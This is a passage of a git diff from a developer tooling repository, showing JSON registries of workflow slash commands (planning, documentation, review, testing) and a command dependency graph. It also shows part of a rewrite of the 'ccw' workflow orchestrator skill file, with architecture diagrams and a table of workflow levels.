"source": "../../../commands/workflow/brainstorm/api-designer.md"
|
||||
},
|
||||
{
|
||||
"name": "ui-designer",
|
||||
"command": "/workflow:brainstorm:ui-designer",
|
||||
"description": "Generate or update ui-designer/analysis.md addressing guidance-specification discussion points for UI design perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/ui-designer.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-plan",
|
||||
"command": "/workflow:lite-plan",
|
||||
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
|
||||
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "plan",
|
||||
"command": "/workflow:plan",
|
||||
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
|
||||
"arguments": "\\\"text description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "replan",
|
||||
"command": "/workflow:replan",
|
||||
"description": "Interactive workflow replanning with session-level artifact updates and boundary clarification through guided questioning",
|
||||
"arguments": "[--session session-id] [task-id] \\\"requirements\\\"|file.md [--interactive]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/replan.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-plan",
|
||||
"command": "/workflow:tdd-plan",
|
||||
"description": "TDD workflow planning with Red-Green-Refactor task chain generation, test-first development structure, and cycle tracking",
|
||||
"arguments": "\\\"feature description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tdd-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:codify-style",
|
||||
"command": "/workflow:ui-design:codify-style",
|
||||
"description": "Orchestrator to extract styles from code and generate shareable reference package with preview (automatic file discovery)",
|
||||
"arguments": "<path> [--package-name <name>] [--output-dir <path>] [--overwrite]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/codify-style.md"
|
||||
},
|
||||
{
|
||||
"name": "design-sync",
|
||||
"command": "/workflow:ui-design:design-sync",
|
||||
"description": "Synchronize finalized design system references to brainstorming artifacts, preparing them for /workflow:plan consumption",
|
||||
"arguments": "--session <session_id> [--selected-prototypes \"<list>\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/design-sync.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:import-from-code",
|
||||
"command": "/workflow:ui-design:import-from-code",
|
||||
"description": "Import design system from code files (CSS/JS/HTML/SCSS) with automatic file discovery and parallel agent analysis",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--source <path>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/import-from-code.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:reference-page-generator",
|
||||
"command": "/workflow:ui-design:reference-page-generator",
|
||||
"description": "Generate multi-component reference pages and documentation from design run extraction",
|
||||
"arguments": "[--design-run <path>] [--package-name <name>] [--output-dir <path>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/reference-page-generator.md"
|
||||
}
|
||||
],
|
||||
"documentation": [
|
||||
{
|
||||
"name": "code-map-memory",
|
||||
"command": "/memory:code-map-memory",
|
||||
"description": "3-phase orchestrator: parse feature keyword → cli-explore-agent analyzes (Deep Scan dual-source) → orchestrator generates Mermaid docs + SKILL package (skips phase 2 if exists)",
|
||||
"arguments": "\\\"feature-keyword\\\" [--regenerate] [--tool <gemini|qwen>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/code-map-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "docs-full-cli",
|
||||
"command": "/memory:docs-full-cli",
|
||||
"description": "Generate full project documentation using CLI execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs-full-cli.md"
|
||||
},
|
||||
{
|
||||
"name": "docs-related-cli",
|
||||
"command": "/memory:docs-related-cli",
|
||||
"description": "Generate/update documentation for git-changed modules using CLI execution with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <15 modules uses direct parallel",
|
||||
"arguments": "[--tool <gemini|qwen|codex>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs-related-cli.md"
|
||||
},
|
||||
{
|
||||
"name": "docs",
|
||||
"command": "/memory:docs",
|
||||
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs.md"
|
||||
},
|
||||
{
|
||||
"name": "load-skill-memory",
|
||||
"command": "/memory:load-skill-memory",
|
||||
"description": "Activate SKILL package (auto-detect from paths/keywords or manual) and intelligently load documentation based on task intent keywords",
|
||||
"arguments": "[skill_name] \\\"task intent description\\",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/load-skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "skill-memory",
|
||||
"command": "/memory:skill-memory",
|
||||
"description": "4-phase autonomous orchestrator: check docs → /memory:docs planning → /workflow:execute → generate SKILL.md with progressive loading index (skips phases 2-3 if docs exist)",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--regenerate] [--mode <full|partial>] [--cli-execute]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "style-skill-memory",
|
||||
"command": "/memory:style-skill-memory",
|
||||
"description": "Generate SKILL memory package from style reference for easy loading and consistent design system usage",
|
||||
"arguments": "[package-name] [--regenerate]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/style-skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "swagger-docs",
|
||||
"command": "/memory:swagger-docs",
|
||||
"description": "Generate complete Swagger/OpenAPI documentation following RESTful standards with global security, API details, error codes, and validation tests",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--format <yaml|json>] [--version <v3.0|v3.1>] [--lang <zh|en>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/swagger-docs.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow-skill-memory",
|
||||
"command": "/memory:workflow-skill-memory",
|
||||
"description": "Process WFS-* archived sessions using universal-executor agents with Gemini analysis to generate workflow-progress SKILL package (sessions-timeline, lessons, conflicts)",
|
||||
"arguments": "session <session-id> | all",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/workflow-skill-memory.md"
|
||||
}
|
||||
],
|
||||
"analysis": [
|
||||
{
|
||||
"name": "review-fix",
|
||||
"command": "/workflow:review-fix",
|
||||
"description": "Automated fixing of code review findings with AI-powered planning and coordinated execution. Uses intelligent grouping, multi-stage timeline coordination, and test-driven verification.",
|
||||
"arguments": "<export-file|review-dir> [--resume] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "review-module-cycle",
|
||||
"command": "/workflow:review-module-cycle",
|
||||
"description": "Independent multi-dimensional code review for specified modules/files. Analyzes specific code paths across 7 dimensions with hybrid parallel-iterative execution, independent of workflow sessions.",
|
||||
"arguments": "<path-pattern> [--dimensions=security,architecture,...] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-module-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "review",
|
||||
"command": "/workflow:review",
|
||||
"description": "Post-implementation review with specialized types (security/architecture/action-items/quality) using analysis agents and Gemini",
|
||||
"arguments": "[--type=security|architecture|action-items|quality] [--archived] [optional: session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review.md"
|
||||
}
|
||||
],
|
||||
"session-management": [
|
||||
{
|
||||
"name": "review-session-cycle",
|
||||
"command": "/workflow:review-session-cycle",
|
||||
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
|
||||
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-session-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "complete",
|
||||
"command": "/workflow:session:complete",
|
||||
"description": "Mark active workflow session as complete, archive with lessons learned, update manifest, remove active flag",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/complete.md"
|
||||
},
|
||||
{
|
||||
"name": "resume",
|
||||
"command": "/workflow:session:resume",
|
||||
"description": "Resume the most recently paused workflow session with automatic session discovery and status update",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/resume.md"
|
||||
}
|
||||
],
|
||||
"testing": [
|
||||
{
|
||||
"name": "tdd-verify",
|
||||
"command": "/workflow:tdd-verify",
|
||||
"description": "Verify TDD workflow compliance against Red-Green-Refactor cycles, generate quality report with coverage analysis",
|
||||
"arguments": "[optional: WFS-session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tdd-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "test-fix-gen",
|
||||
"command": "/workflow:test-fix-gen",
|
||||
"description": "Create test-fix workflow session from session ID, description, or file path with test strategy generation and task planning",
|
||||
"arguments": "(source-session-id | \\\"feature description\\\" | /path/to/file.md)",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-fix-gen.md"
|
||||
},
|
||||
{
|
||||
"name": "test-gen",
|
||||
"command": "/workflow:test-gen",
|
||||
"description": "Create independent test-fix workflow session from completed implementation session, analyzes code to generate test tasks",
|
||||
"arguments": "source-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-gen.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-coverage-analysis",
|
||||
"command": "/workflow:tools:tdd-coverage-analysis",
|
||||
"description": "Analyze test coverage and TDD cycle execution with Red-Green-Refactor compliance verification",
|
||||
"arguments": "--session WFS-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/tdd-coverage-analysis.md"
|
||||
},
|
||||
{
|
||||
"name": "test-concept-enhanced",
|
||||
"command": "/workflow:tools:test-concept-enhanced",
|
||||
"description": "Coordinate test analysis workflow using cli-execution-agent to generate test strategy via Gemini",
|
||||
"arguments": "--session WFS-test-session-id --context path/to/test-context-package.json",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-concept-enhanced.md"
|
||||
},
|
||||
{
|
||||
"name": "test-context-gather",
|
||||
"command": "/workflow:tools:test-context-gather",
|
||||
"description": "Collect test coverage context using test-context-search-agent and package into standardized test-context JSON",
|
||||
"arguments": "--session WFS-test-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-context-gather.md"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,160 +0,0 @@
|
||||
{
|
||||
"workflow:plan": {
|
||||
"calls_internally": [
|
||||
"workflow:session:start",
|
||||
"workflow:tools:context-gather",
|
||||
"workflow:tools:conflict-resolution",
|
||||
"workflow:tools:task-generate-agent"
|
||||
],
|
||||
"next_steps": [
|
||||
"workflow:action-plan-verify",
|
||||
"workflow:status",
|
||||
"workflow:execute"
|
||||
],
|
||||
"alternatives": [
|
||||
"workflow:tdd-plan"
|
||||
],
|
||||
"prerequisites": []
|
||||
},
|
||||
"workflow:tdd-plan": {
|
||||
"calls_internally": [
|
||||
"workflow:session:start",
|
||||
"workflow:tools:context-gather",
|
||||
"workflow:tools:task-generate-tdd"
|
||||
],
|
||||
"next_steps": [
|
||||
"workflow:tdd-verify",
|
||||
"workflow:status",
|
||||
"workflow:execute"
|
||||
],
|
||||
"alternatives": [
|
||||
"workflow:plan"
|
||||
],
|
||||
"prerequisites": []
|
||||
},
|
||||
"workflow:execute": {
|
||||
"prerequisites": [
|
||||
"workflow:plan",
|
||||
"workflow:tdd-plan"
|
||||
],
|
||||
"related": [
|
||||
"workflow:status",
|
||||
"workflow:resume"
|
||||
],
|
||||
"next_steps": [
|
||||
"workflow:review",
|
||||
"workflow:tdd-verify"
|
||||
]
|
||||
},
|
||||
"workflow:action-plan-verify": {
|
||||
"prerequisites": [
|
||||
"workflow:plan"
|
||||
],
|
||||
"next_steps": [
|
||||
"workflow:execute"
|
||||
],
|
||||
"related": [
|
||||
"workflow:status"
|
||||
]
|
||||
},
|
||||
"workflow:tdd-verify": {
|
||||
"prerequisites": [
|
||||
"workflow:execute"
|
||||
],
|
||||
"related": [
|
||||
"workflow:tools:tdd-coverage-analysis"
|
||||
]
|
||||
},
|
||||
"workflow:session:start": {
|
||||
"next_steps": [
|
||||
"workflow:plan",
|
||||
"workflow:execute"
|
||||
],
|
||||
"related": [
|
||||
"workflow:session:list",
|
||||
"workflow:session:resume"
|
||||
]
|
||||
},
|
||||
"workflow:session:resume": {
|
||||
"alternatives": [
|
||||
"workflow:resume"
|
||||
],
|
||||
"related": [
|
||||
"workflow:session:list",
|
||||
"workflow:status"
|
||||
]
|
||||
},
|
||||
"workflow:lite-plan": {
|
||||
"calls_internally": [
|
||||
"workflow:lite-execute"
|
||||
],
|
||||
"next_steps": [
|
||||
"workflow:lite-execute",
|
||||
"workflow:status"
|
||||
],
|
||||
"alternatives": [
|
||||
"workflow:plan"
|
||||
],
|
||||
"prerequisites": []
|
||||
},
|
||||
"workflow:lite-fix": {
|
||||
"next_steps": [
|
||||
"workflow:lite-execute",
|
||||
"workflow:status"
|
||||
],
|
||||
"alternatives": [
|
||||
"workflow:lite-plan"
|
||||
],
|
||||
"related": [
|
||||
"workflow:test-cycle-execute"
|
||||
]
|
||||
},
|
||||
"workflow:lite-execute": {
|
||||
"prerequisites": [
|
||||
"workflow:lite-plan",
|
||||
"workflow:lite-fix"
|
||||
],
|
||||
"related": [
|
||||
"workflow:execute",
|
||||
"workflow:status"
|
||||
]
|
||||
},
|
||||
"workflow:review-session-cycle": {
|
||||
"prerequisites": [
|
||||
"workflow:execute"
|
||||
],
|
||||
"next_steps": [
|
||||
"workflow:review-fix"
|
||||
],
|
||||
"related": [
|
||||
"workflow:review-module-cycle"
|
||||
]
|
||||
},
|
||||
"workflow:review-fix": {
|
||||
"prerequisites": [
|
||||
"workflow:review-module-cycle",
|
||||
"workflow:review-session-cycle"
|
||||
],
|
||||
"related": [
|
||||
"workflow:test-cycle-execute"
|
||||
]
|
||||
},
|
||||
"memory:docs": {
|
||||
"calls_internally": [
|
||||
"workflow:session:start",
|
||||
"workflow:tools:context-gather"
|
||||
],
|
||||
"next_steps": [
|
||||
"workflow:execute"
|
||||
]
|
||||
},
|
||||
"memory:skill-memory": {
|
||||
"next_steps": [
|
||||
"workflow:plan",
|
||||
"cli:analyze"
|
||||
],
|
||||
"related": [
|
||||
"memory:load-skill-memory"
|
||||
]
|
||||
}
|
||||
}
|
||||
@@ -1,112 +0,0 @@
|
||||
[
|
||||
{
|
||||
"name": "lite-plan",
|
||||
"command": "/workflow:lite-plan",
|
||||
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
|
||||
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-fix",
|
||||
"command": "/workflow:lite-fix",
|
||||
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
|
||||
"arguments": "[--hotfix] \\\"bug description or issue reference\\",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "plan",
|
||||
"command": "/workflow:plan",
|
||||
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
|
||||
"arguments": "\\\"text description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/workflow:execute",
|
||||
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
|
||||
"arguments": "[--resume-session=\\\"session-id\\\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "start",
|
||||
"command": "/workflow:session:start",
|
||||
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
|
||||
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/start.md"
|
||||
},
|
||||
{
|
||||
"name": "review-session-cycle",
|
||||
"command": "/workflow:review-session-cycle",
|
||||
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
|
||||
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-session-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "docs",
|
||||
"command": "/memory:docs",
|
||||
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs.md"
|
||||
},
|
||||
{
|
||||
"name": "artifacts",
|
||||
"command": "/workflow:brainstorm:artifacts",
|
||||
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
|
||||
"arguments": "topic or challenge description [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/artifacts.md"
|
||||
},
|
||||
{
|
||||
"name": "action-plan-verify",
|
||||
"command": "/workflow:action-plan-verify",
|
||||
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
|
||||
"arguments": "[optional: --session session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/action-plan-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "version",
|
||||
"command": "/version",
|
||||
"description": "Display Claude Code version information and check for updates",
|
||||
"arguments": "",
|
||||
"category": "general",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Beginner",
|
||||
"source": "../../../commands/version.md"
|
||||
}
|
||||
]
|
||||
@@ -1,462 +1,522 @@
|
||||
---
|
||||
name: ccw
|
||||
description: Stateless workflow orchestrator that automatically selects and executes the optimal workflow combination based on task intent. Supports rapid (lite-plan+execute), full (brainstorm+plan+execute), coupled (plan+execute), bugfix (lite-fix), and issue (multi-point fixes) workflows. Triggers on "ccw", "workflow", "自动工作流", "智能调度".
|
||||
allowed-tools: Task(*), SlashCommand(*), AskUserQuestion(*), Read(*), Bash(*), Grep(*)
|
||||
description: Stateless workflow orchestrator. Auto-selects optimal workflow based on task intent. Triggers "ccw", "workflow".
|
||||
allowed-tools: Task(*), SlashCommand(*), AskUserQuestion(*), Read(*), Bash(*), Grep(*), TodoWrite(*)
|
||||
---
|
||||
|
||||
# CCW - Claude Code Workflow Orchestrator
|
||||
|
||||
Stateless workflow coordinator that automatically selects and executes the optimal workflow combination based on task intent.
Stateless workflow coordinator that automatically selects the optimal workflow based on task intent.
|
||||
|
||||
## Architecture Overview
|
||||
## Workflow System Overview
|
||||
|
||||
CCW provides two workflow systems, **Main Workflow** and **Issue Workflow**, which together cover the complete software development lifecycle.
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────────────────┐
|
||||
│ Main Workflow │
|
||||
│ │
|
||||
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
|
||||
│ │ Level 1 │ → │ Level 2 │ → │ Level 3 │ → │ Level 4 │ │
|
||||
│ │ Rapid │ │ Lightweight │ │ Standard │ │ Brainstorm │ │
|
||||
│ │ │ │ │ │ │ │ │ │
|
||||
│ │ lite-lite- │ │ lite-plan │ │ plan │ │ brainstorm │ │
|
||||
│ │ lite │ │ lite-fix │ │ tdd-plan │ │ :auto- │ │
|
||||
│ │ │ │ multi-cli- │ │ test-fix- │ │ parallel │ │
|
||||
│ │ │ │ plan │ │ gen │ │ ↓ │ │
|
||||
│ │ │ │ │ │ │ │ plan │ │
|
||||
│ └─────────────┘ └─────────────┘ └─────────────┘ └─────────────┘ │
|
||||
│ │
|
||||
│ Complexity: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━▶ │
|
||||
│ Low High │
|
||||
└─────────────────────────────────────────────────────────────────────────────┘
|
||||
│
|
||||
│ After development
|
||||
▼
|
||||
┌─────────────────────────────────────────────────────────────────────────────┐
|
||||
│ Issue Workflow │
|
||||
│ │
|
||||
│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │
|
||||
│ │ Accumulate │ → │ Plan │ → │ Execute │ │
|
||||
│ │ Discover & │ │ Batch │ │ Parallel │ │
|
||||
│ │ Collect │ │ Planning │ │ Execution │ │
|
||||
│ └──────────────┘ └──────────────┘ └──────────────┘ │
|
||||
│ │
|
||||
│ Supplementary role: Maintain main branch stability, worktree isolation │
|
||||
└─────────────────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Architecture
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ CCW Orchestrator (Stateless) │
|
||||
│ CCW Orchestrator (CLI-Enhanced + Requirement Analysis) │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ │
|
||||
│ Input Analysis │
|
||||
│ ├─ Intent Classification (bugfix/feature/refactor/issue/...) │
|
||||
│ ├─ Complexity Assessment (low/medium/high) │
|
||||
│ ├─ Context Detection (codebase familiarity needed?) │
|
||||
│ └─ Constraint Extraction (time/scope/quality) │
|
||||
│ │
|
||||
│ Workflow Selection (Decision Tree) │
|
||||
│ ├─ 🐛 Bug? → lite-fix / lite-fix --hotfix │
|
||||
│ ├─ ❓ Unclear? → brainstorm → plan → execute │
|
||||
│ ├─ ⚡ Simple? → lite-plan → lite-execute │
|
||||
│ ├─ 🔧 Complex? → plan → execute │
|
||||
│ ├─ 📋 Issue? → issue:plan → issue:queue → issue:execute │
|
||||
│ └─ 🎨 UI? → ui-design → plan → execute │
|
||||
│ │
|
||||
│ Execution Dispatch │
|
||||
│ └─ SlashCommand("/workflow:xxx") or Task(agent) │
|
||||
│ │
|
||||
│ Phase 1 │ Input Analysis (rule-based, fast path) │
|
||||
│ Phase 1.5 │ CLI Classification (semantic, smart path) │
|
||||
│ Phase 1.75 │ Requirement Clarification (clarity < 2) │
|
||||
│ Phase 2 │ Level Selection (intent → level → workflow) │
|
||||
│ Phase 2.5 │ CLI Action Planning (high complexity) │
|
||||
│ Phase 3 │ User Confirmation (optional) │
|
||||
│ Phase 4 │ TODO Tracking Setup │
|
||||
│ Phase 5 │ Execution Loop │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Workflow Combinations (组合技)
|
||||
## Level Quick Reference
|
||||
|
||||
### 1. Rapid (快速迭代) ⚡
|
||||
**Pattern**: 多模型协作分析 + 直接执行
|
||||
**Commands**: `/workflow:lite-plan` → `/workflow:lite-execute`
|
||||
**When to use**:
|
||||
- 明确知道做什么和怎么做
|
||||
- 单一功能或小型改动
|
||||
- 快速原型验证
|
||||
| Level | Name | Workflows | Artifacts | Execution |
|
||||
|-------|------|-----------|-----------|-----------|
|
||||
| **1** | Rapid | `lite-lite-lite` | None | Direct execute |
|
||||
| **2** | Lightweight | `lite-plan`, `lite-fix`, `multi-cli-plan` | Memory/Lightweight files | → `lite-execute` |
|
||||
| **3** | Standard | `plan`, `tdd-plan`, `test-fix-gen` | Session persistence | → `execute` / `test-cycle-execute` |
|
||||
| **4** | Brainstorm | `brainstorm:auto-parallel` → `plan` | Multi-role analysis + Session | → `execute` |
|
||||
| **-** | Issue | `discover` → `plan` → `queue` → `execute` | Issue records | Worktree isolation (optional) |
|
||||
|
||||
### 2. Full (完整流程) 📋
|
||||
**Pattern**: 分析 + 头脑风暴 + 规划 + 执行
|
||||
**Commands**: `/workflow:brainstorm:auto-parallel` → `/workflow:plan` → `/workflow:execute`
|
||||
**When to use**:
|
||||
- 不确定产品方向或技术方案
|
||||
- 需要多角色视角分析
|
||||
- 复杂新功能开发
|
||||
## Workflow Selection Decision Tree
|
||||
|
||||
### 3. Coupled (复杂耦合) 🔗
|
||||
**Pattern**: 完整规划 + 验证 + 执行
|
||||
**Commands**: `/workflow:plan` → `/workflow:action-plan-verify` → `/workflow:execute`
|
||||
**When to use**:
|
||||
- 跨模块依赖
|
||||
- 架构级变更
|
||||
- 团队协作项目
|
||||
|
||||
### 4. Bugfix (缺陷修复) 🐛
|
||||
**Pattern**: 智能诊断 + 修复
|
||||
**Commands**: `/workflow:lite-fix` or `/workflow:lite-fix --hotfix`
|
||||
**When to use**:
|
||||
- 任何有明确症状的Bug
|
||||
- 生产事故紧急修复
|
||||
